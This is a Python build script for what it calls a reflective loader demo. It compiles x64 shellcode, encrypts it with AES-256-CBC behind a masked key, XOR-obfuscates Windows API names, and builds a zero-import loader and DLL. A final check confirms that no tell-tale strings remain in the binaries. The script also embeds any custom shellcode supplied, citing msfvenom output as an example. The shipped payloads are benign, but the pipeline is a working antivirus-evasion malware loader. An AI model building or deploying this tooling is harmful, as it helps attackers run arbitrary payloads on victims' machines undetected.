#!/usr/bin/env python3
"""
build.py - build the AES-256-CBC encrypted reflective loader demo.

Usage:
    python3 build.py                      # demo shellcode variants only
    python3 build.py payload.bin          # embed a custom raw x64 shellcode blob

Architecture:
  dll/shellcode.c       PIC x64 shellcode (marker / MessageBox variants)
    --compile--> .o --objcopy .sc--> raw bin --AES-256-CBC--> build/payload_sc.h
  dll/stub_dll.c        demo DLL: DllMain decrypts payload_sc.h and runs it.
                        When a custom blob is supplied it is preferred over the
                        demo variants and executed at entry offset 0.
  loader/loader.c       zero-import reflective loader: reads stub.dll from disk,
                        reflectively maps it, runs DllMain

Custom shellcode requirements (the payload.bin argument):
  - x64, position-independent, raw bytes (e.g. msfvenom -f raw output)
  - executed from a fresh PAGE_EXECUTE_READ buffer at entry offset 0, no args
  - up to 4 MiB (the built-in demo variants are limited to 2048 bytes)

Steps:
  1. generate build/sc_hashes.h    (djb2 hashes used by the shellcode)
  2. compile both shellcode variants, extract the .sc section to raw blobs
  3. generate build/payload_sc.h   (AES-256-CBC encrypted blobs + masked key/IV)
  4. generate loader/obf_strings.h (XOR-obfuscated API names + DLL file name)
  5. compile stub.dll / stub_marker.dll
  6. compile loader.exe / loader_marker.exe (zero imports, custom entry)
  7. verify: entry point inside .text, import table, .sc relocation freedom,
     AES round-trip, static hygiene (no plaintext strings / payload names)
"""

import os
import re
import secrets
import subprocess
import sys

from Crypto.Cipher import AES

ROOT        = os.path.dirname(os.path.abspath(__file__))
LOADER_DIR  = os.path.join(ROOT, "loader")
DLL_DIR     = os.path.join(ROOT, "dll")
BUILD_DIR   = os.path.join(ROOT, "build")
SC_HASHES_H = os.path.join(BUILD_DIR, "sc_hashes.h")
PAYLOAD_SC_H = os.path.join(BUILD_DIR, "payload_sc.h")
OBF_H       = os.path.join(LOADER_DIR, "obf_strings.h")

MINGW_CC    = os.environ.get("MINGW_CC", "x86_64-w64-mingw32-gcc")
OBJCOPY     = os.environ.get("OBJCOPY", "x86_64-w64-mingw32-objcopy")
OBJDUMP     = os.environ.get("OBJDUMP", "x86_64-w64-mingw32-objdump")
NM          = os.environ.get("NM", "x86_64-w64-mingw32-nm")

DEMO_MAX_SC_SIZE = 2048            # built-in demo shellcode size limit
USER_MAX_SC_SIZE = 0x400000        # custom shellcode limit (4 MiB)
MAX_DLL_SIZE     = 0x1000000       # loader refuses DLLs larger than 16 MiB

API_NAMES = [
    "LoadLibraryA",
    "VirtualAlloc",
    "VirtualProtect",
    "VirtualFree",
    "ExitProcess",
    "CreateFileA",
    "GetFileSizeEx",
    "ReadFile",
    "CloseHandle",
]

# identifier -> literal value, also XOR-obfuscated into obf_strings.h
EXTRA_STRINGS = {
    "dll_filename":        "stub.dll",
    "dll_filename_marker": "stub_marker.dll",
}

SC_FLAGS = [
    "-c", "-O2", "-Wall", "-Wextra",
    "-fno-builtin",
    "-fno-stack-protector",
    "-fno-asynchronous-unwind-tables",
    "-fno-unwind-tables",
    "-fno-ident",
    "-mno-red-zone",
    "-mno-stack-arg-probe",
    "-Wno-array-bounds",          # mingw __readgsqword inlining false positive
    "-I", BUILD_DIR,
]

LOADER_FLAGS = [
    "-O2", "-Wall", "-Wextra",
    "-nostdlib",
    "-fno-builtin",
    "-fno-stack-protector",
    "-fno-asynchronous-unwind-tables",
    "-fno-unwind-tables",
    "-fno-ident",
    "-mno-red-zone",
    "-Wl,-e,entry",
    "-Wl,--subsystem,console",
    "-Wl,--strip-all",
]


def run(cmd, **kw):
    print("+ " + " ".join(cmd), flush=True)
    subprocess.check_call(cmd, **kw)


def djb2(s):
    """djb2 over an ASCII string (matches sc_hash / sc_hash_w in shellcode.c)."""
    h = 5381
    for ch in s:
        h = ((h << 5) + h + ord(ch)) & 0xFFFFFFFF
    return h


def gen_sc_hashes(path):
    """Module names are hashed lowercase base-name (sc_hash_w lowercases the
    wide BaseDllName); export names are hashed with their exact case."""
    mods = {"kernel32": djb2("kernel32"), "user32": djb2("user32")}
    exps = {
        "CreateFileA": djb2("CreateFileA"),
        "WriteFile":   djb2("WriteFile"),
        "CloseHandle": djb2("CloseHandle"),
        "MessageBoxA": djb2("MessageBoxA"),
    }
    lines = ["#ifndef SC_HASHES_H", "#define SC_HASHES_H", "",
             "/* generated by build.py - do not edit */", ""]
    for name, val in mods.items():
        lines.append("#define HASH_%-11s 0x%08xu" % (name.upper(), val))
    lines.append("")
    for name, val in exps.items():
        lines.append("#define HASH_%-11s 0x%08xu" % (name.upper(), val))
    lines.append("")
    lines.append("#endif")
    with open(path, "w") as f:
        f.write("\n".join(lines) + "\n")
    print("generated %s" % path)


def entry_offset(obj_path, sym="sc_entry"):
    """Offset of a global symbol inside its section (relocatable object)."""
    try:
        out = subprocess.check_output([NM, obj_path], text=True,
                                      stderr=subprocess.STDOUT)
        for line in out.splitlines():
            parts = line.split()
            if len(parts) >= 3 and parts[-1] == sym and parts[-2] in "Tt":
                return int(parts[0], 16)
    except (subprocess.CalledProcessError, OSError, ValueError):
        pass
    out = subprocess.check_output([OBJDUMP, "-t", obj_path], text=True,
                                  stderr=subprocess.STDOUT)
    for line in out.splitlines():
        m = re.match(r"^\s*([0-9a-fA-F]+)\s+g\s+F\s+\.\S+\s+\S+\s+%s$" % sym, line)
        if m:
            return int(m.group(1), 16)
    raise RuntimeError("symbol %s not found in %s" % (sym, obj_path))


def compile_shellcode(variant):
    """Compile one shellcode variant and extract the .sc section to a raw bin.
    Returns (bin_path, plaintext_len, entry_offset)."""
    obj = os.path.join(BUILD_DIR, "shellcode_%s.o" % variant)
    bin_path = os.path.join(BUILD_DIR, "sc_%s.bin" % variant)
    define = "SHELLCODE_MARKER" if variant == "marker" else "SHELLCODE_MSGBOX"
    run([MINGW_CC] + SC_FLAGS + ["-D%s" % define,
         os.path.join(DLL_DIR, "shellcode.c"), "-o", obj])
    run([OBJCOPY, "-O", "binary", "--only-section=.sc", obj, bin_path])
    with open(bin_path, "rb") as f:
        data = f.read()
    if not (0 < len(data) <= DEMO_MAX_SC_SIZE):
        raise RuntimeError("shellcode %s size %d out of range (1..%d)"
                           % (variant, len(data), DEMO_MAX_SC_SIZE))
    off = entry_offset(obj)
    if not (0 < off < len(data)):
        raise RuntimeError("shellcode %s entry offset %d invalid for size %d"
                           % (variant, off, len(data)))
    # no relocations may remain in the blob (calls are intra-section resolved)
    rel = subprocess.check_output([OBJDUMP, "-r", obj], text=True,
                                  stderr=subprocess.STDOUT)
    if "R_X86_64" in rel:
        raise RuntimeError("shellcode %s still contains relocations:\n%s"
                           % (variant, rel))
    print("shellcode %s: %d bytes, sc_entry at offset 0x%x" % (variant, len(data), off))
    return bin_path, len(data), off


def c_arr(b, per_line=12):
    parts = ["0x%02x" % x for x in b]
    lines = []
    for i in range(0, len(parts), per_line):
        lines.append(", ".join(parts[i:i + per_line]))
    return ",\n    ".join(lines)


def gen_payload_sc(path, blobs, key, iv, xor):
    """blobs: {variant: (ct_bytes, plain_len, entry_off)}; header symbols use
    the MSGBOX spelling to match the code; user blob is SC_USER_*."""
    suffix = {"marker": "MARKER", "msgbx": "MSGBOX", "user": "USER"}
    body = ["#ifndef PAYLOAD_SC_H", "#define PAYLOAD_SC_H", "",
            "/* generated by build.py - do not edit */", ""]
    for variant, (ct, plen, off) in blobs.items():
        up = suffix.get(variant, variant.upper())
        body.append("/* %s shellcode: %d plaintext bytes -> %d encrypted bytes */"
                    % (variant, plen, len(ct)))
        body.append("static const unsigned char SC_%s_ENC[] = {" % up)
        body.append("    " + c_arr(ct))
        body.append("};")
        body.append("static const size_t SC_%s_ENC_LEN = %d;" % (up, len(ct)))
        body.append("static const size_t SC_%s_ENTRY_OFFSET = %d;" % (up, off))
        body.append("")
    if "user" in blobs:
        body.append("/* custom user shellcode supplied to build.py */")
        body.append("#define SC_USER_PRESENT 1")
        body.append("")
    body.append("static const unsigned char SC_KEY_X[32] = {")
    body.append("    " + c_arr(bytes(b ^ xor for b in key), per_line=8))
    body.append("};")
    body.append("")
    body.append("static const unsigned char SC_IV_X[16] = {")
    body.append("    " + c_arr(bytes(b ^ xor for b in iv), per_line=8))
    body.append("};")
    body.append("")
    body.append("static const unsigned char SC_XOR = 0x%02x;" % xor)
    body.append("")
    body.append("#endif")
    with open(path, "w") as f:
        f.write("\n".join(body) + "\n")
    print("generated %s" % path)


def gen_obf_strings(path):
    """XOR each string with its own random byte; loader decrypts at runtime."""
    lines = ["#ifndef OBF_STRINGS_H", "#define OBF_STRINGS_H", "",
             "/* generated by build.py - do not edit */", ""]
    items = [(n, n) for n in API_NAMES] + list(EXTRA_STRINGS.items())
    for ident, value in items:
        key = secrets.randbelow(256)
        while key == 0:                    # key 0 would leave plaintext in the binary
            key = secrets.randbelow(256)
        enc = bytes(ord(c) ^ key for c in value)
        arr = ", ".join("0x%02x" % b for b in enc)
        # volatile: gcc must not constant-fold the XOR at compile time, which
        # would embed the reconstructed plaintext into the binary
        lines.append("static const volatile unsigned char obf_%s[] = { %s };" % (ident, arr))
        lines.append("#define OBF_%s_LEN %d" % (ident.upper(), len(value)))
        lines.append("#define OBF_%s_KEY 0x%02x" % (ident.upper(), key))
        lines.append("")
    lines.append("#endif")
    with open(path, "w") as f:
        f.write("\n".join(lines) + "\n")
    print("generated %s (%d strings)" % (path, len(items)))


def compile_stub_dlls():
    src = os.path.join(DLL_DIR, "stub_dll.c")
    aes = os.path.join(LOADER_DIR, "aes.c")
    run([MINGW_CC, "-shared", "-O2", "-s",
         "-I", LOADER_DIR, "-I", BUILD_DIR,
         src, aes, "-o", os.path.join(BUILD_DIR, "stub.dll"), "-luser32"])
    run([MINGW_CC, "-shared", "-O2", "-s", "-DMARKER",
         "-I", LOADER_DIR, "-I", BUILD_DIR,
         src, aes, "-o", os.path.join(BUILD_DIR, "stub_marker.dll")])


def compile_loader(exe_name, marker=False):
    flags = list(LOADER_FLAGS)
    if marker:
        flags.append("-DMARKER")
    run([MINGW_CC] + flags +
        [os.path.join(LOADER_DIR, "loader.c"),
         "-o", os.path.join(BUILD_DIR, exe_name)])


def pe_entry_info(exe_path):
    """Parse a PE file and return (image_base, entry_rva, sections)."""
    with open(exe_path, "rb") as f:
        data = f.read()
    if data[:2] != b"MZ":
        raise RuntimeError("%s: not a PE (no MZ)" % exe_path)
    lfanew = int.from_bytes(data[0x3C:0x40], "little")
    if data[lfanew:lfanew + 4] != b"PE\0\0":
        raise RuntimeError("%s: bad PE signature" % exe_path)
    magic = int.from_bytes(data[lfanew + 24:lfanew + 26], "little")
    if magic == 0x20B:                       # PE32+
        opt = lfanew + 24
        entry_rva = int.from_bytes(data[opt + 16:opt + 20], "little")
        image_base = int.from_bytes(data[opt + 24:opt + 32], "little")
        secoff = opt + 240
    elif magic == 0x10B:                     # PE32
        opt = lfanew + 24
        entry_rva = int.from_bytes(data[opt + 16:opt + 20], "little")
        image_base = int.from_bytes(data[opt + 28:opt + 32], "little")
        secoff = opt + 224
    else:
        raise RuntimeError("%s: bad optional header magic 0x%x" % (exe_path, magic))
    nsec = int.from_bytes(data[lfanew + 6:lfanew + 8], "little")
    sections = []
    for i in range(nsec):
        off = secoff + i * 40
        if off + 40 > len(data):
            break
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize = int.from_bytes(data[off + 8:off + 12], "little")
        va = int.from_bytes(data[off + 12:off + 16], "little")
        sections.append((name, va, vsize))
    return image_base, entry_rva, sections


def verify_pe(exe_path):
    """Entry point must point into an executable section - the meaningful
    invariant (the concrete address depends on toolchain/code size, so a
    hardcoded expectation would be a false failure)."""
    print("\n== verify %s ==" % exe_path)
    ok = True
    out = subprocess.check_output(["objdump", "-f", exe_path],
                                  text=True, stderr=subprocess.STDOUT)
    entry = [l for l in out.splitlines() if "start address" in l]
    entry_val = entry[0].strip() if entry else "?"
    print("entry:", entry_val)

    ib, entry_rva, secs = pe_entry_info(exe_path)
    print("image base 0x%016x, entry rva 0x%x" % (ib, entry_rva))
    inside = any(va <= entry_rva < va + vsize for name, va, vsize in secs)
    m = re.search(r"0x[0-9a-fA-F]+", entry_val)
    if m and int(m.group(0), 16) != ib + entry_rva:
        print("  !! objdump entry does not match PE header entry")
        ok = False
    if not inside:
        print("  !! entry rva 0x%x not inside any section" % entry_rva)
        ok = False
    else:
        for name, va, vsize in secs:
            if va <= entry_rva < va + vsize:
                print("entry rva in section %-8s [0x%x, 0x%x)" % (name, va, va + vsize))

    p = subprocess.check_output(["objdump", "-p", exe_path],
                                text=True, stderr=subprocess.STDOUT)
    imports = [l for l in p.splitlines() if l.strip().startswith("DLL Name")]
    print("imports:", len(imports))
    if imports:
        for l in imports:
            print("  ", l.strip())
        ok = False
    h = subprocess.check_output(["objdump", "-h", exe_path],
                                text=True, stderr=subprocess.STDOUT)
    for l in h.splitlines():
        if any(k in l for k in (".text", ".data", ".rdata", ".reloc")):
            print(" ", " ".join(l.split()))
    size = os.path.getsize(exe_path)
    print("size: %d bytes" % size)
    return ok


def hygiene_check(path, needles, label):
    """Static-string hygiene: `needles` must NOT appear anywhere in the file."""
    with open(path, "rb") as f:
        data = f.read()
    bad = [n for n in needles if n in data]
    if bad:
        print("  !! %s contains plaintext: %s" % (label, [b.decode() for b in bad]))
        return False
    print("%s hygiene OK (%d bytes checked)" % (label, len(data)))
    return True


def verify_roundtrip(bin_path, ct, key, iv):
    plain = AES.new(key, AES.MODE_CBC, iv).decrypt(ct)
    pad = plain[-1]
    assert 1 <= pad <= 16 and plain[-pad:] == bytes([pad]) * pad
    plain = plain[:-pad]
    with open(bin_path, "rb") as f:
        orig = f.read()
    assert plain == orig, "AES round-trip mismatch for %s" % bin_path
    return True


def main():
    user_sc = None
    if len(sys.argv) > 1:
        user_sc = os.path.abspath(sys.argv[1])
        if not os.path.isfile(user_sc):
            print("user shellcode not found: %s" % user_sc)
            sys.exit(1)
        with open(user_sc, "rb") as f:
            user_data = f.read()
        if not (0 < len(user_data) <= USER_MAX_SC_SIZE):
            print("user shellcode size %d out of range (1..%d)"
                  % (len(user_data), USER_MAX_SC_SIZE))
            sys.exit(1)
        print("== 0/7 user shellcode: %d bytes (%s) =="
              % (len(user_data), user_sc))
    else:
        print("== 0/7 no user shellcode - demo variants only ==")

    os.makedirs(BUILD_DIR, exist_ok=True)

    print("\n== 1/7 generate sc_hashes.h ==")
    gen_sc_hashes(SC_HASHES_H)

    print("\n== 2/7 compile + extract shellcode blobs ==")
    bin_marker, plen_marker, off_marker = compile_shellcode("marker")
    bin_msgbx,  plen_msgbx,  off_msgbx  = compile_shellcode("msgbx")

    print("\n== 3/7 encrypt shellcode -> payload_sc.h ==")
    key = secrets.token_bytes(32)
    iv  = secrets.token_bytes(16)
    xor = secrets.randbelow(256)
    while xor == 0:
        xor = secrets.randbelow(256)
    blobs = {}
    for variant, bin_path, plen, off in (
            ("marker", bin_marker, plen_marker, off_marker),
            ("msgbx",  bin_msgbx,  plen_msgbx,  off_msgbx)):
        with open(bin_path, "rb") as f:
            raw = f.read()
        pad = 16 - (len(raw) % 16)
        ct = AES.new(key, AES.MODE_CBC, iv).encrypt(raw + bytes([pad]) * pad)
        assert len(ct) % 16 == 0
        blobs[variant] = (ct, plen, off)
        verify_roundtrip(bin_path, ct, key, iv)
        print("encrypted %s: %d -> %d bytes" % (variant, len(raw), len(ct)))
    if user_sc is not None:
        raw = user_data
        pad = 16 - (len(raw) % 16)
        ct = AES.new(key, AES.MODE_CBC, iv).encrypt(raw + bytes([pad]) * pad)
        assert len(ct) % 16 == 0
        blobs["user"] = (ct, len(raw), 0)   # custom blob runs at entry offset 0
        verify_roundtrip(user_sc, ct, key, iv)
        print("encrypted user: %d -> %d bytes (entry offset 0)" % (len(raw), len(ct)))
    gen_payload_sc(PAYLOAD_SC_H, blobs, key, iv, xor)

    print("\n== 4/7 generate obf_strings.h ==")
    gen_obf_strings(OBF_H)

    print("\n== 5/7 compile stub DLLs ==")
    compile_stub_dlls()

    print("\n== 6/7 compile loaders ==")
    compile_loader("loader.exe")
    compile_loader("loader_marker.exe", marker=True)

    print("\n== 7/7 verify ==")
    ok = True
    ok &= verify_pe(os.path.join(BUILD_DIR, "loader.exe"))
    ok &= verify_pe(os.path.join(BUILD_DIR, "loader_marker.exe"))

    # shellcode blobs: relocation-free (already enforced) + size sanity
    for variant in ("marker", "msgbx"):
        bin_path = os.path.join(BUILD_DIR, "sc_%s.bin" % variant)
        sz = os.path.getsize(bin_path)
        print("sc_%s.bin: %d bytes" % (variant, sz))
        if not (0 < sz <= DEMO_MAX_SC_SIZE):
            ok = False
    if user_sc is not None:
        print("user blob: %d bytes (encrypted + embedded in both DLLs)" % len(user_data))

    # hygiene: DLLs must not expose the shellcode plaintext or file names
    dll_needles = [b"shellcode_marker", b"shellcode_marker.txt",
                   b"encrypted shellcode", b"reflective loader: encrypted",
                   b"stub_dll", b"payload_sc", b"sc_entry"]
    ok &= hygiene_check(os.path.join(BUILD_DIR, "stub.dll"), dll_needles, "stub.dll")
    ok &= hygiene_check(os.path.join(BUILD_DIR, "stub_marker.dll"), dll_needles,
                        "stub_marker.dll")

    # hygiene: loaders must not expose API names or the DLL file name
    loader_needles = [b"stub.dll", b"stub_marker.dll",
                      b"LoadLibraryA", b"VirtualAlloc", b"VirtualProtect",
                      b"VirtualFree", b"ExitProcess", b"CreateFileA",
                      b"GetFileSizeEx", b"ReadFile", b"CloseHandle"]
    ok &= hygiene_check(os.path.join(BUILD_DIR, "loader.exe"), loader_needles,
                        "loader.exe")
    ok &= hygiene_check(os.path.join(BUILD_DIR, "loader_marker.exe"), loader_needles,
                        "loader_marker.exe")

    # MZ must only appear at offset 0 of each DLL
    for name in ("stub.dll", "stub_marker.dll"):
        p = os.path.join(BUILD_DIR, name)
        with open(p, "rb") as f:
            data = f.read()
        if data[:2] != b"MZ" or data.find(b"MZ", 2, 0x400) != -1:
            print("  !! %s: MZ signature issue" % name)
            ok = False

    print("\nbuild %s" % ("OK" if ok else "FAILED"))
    sys.exit(0 if ok else 1)


if __name__ == "__main__":
    main()
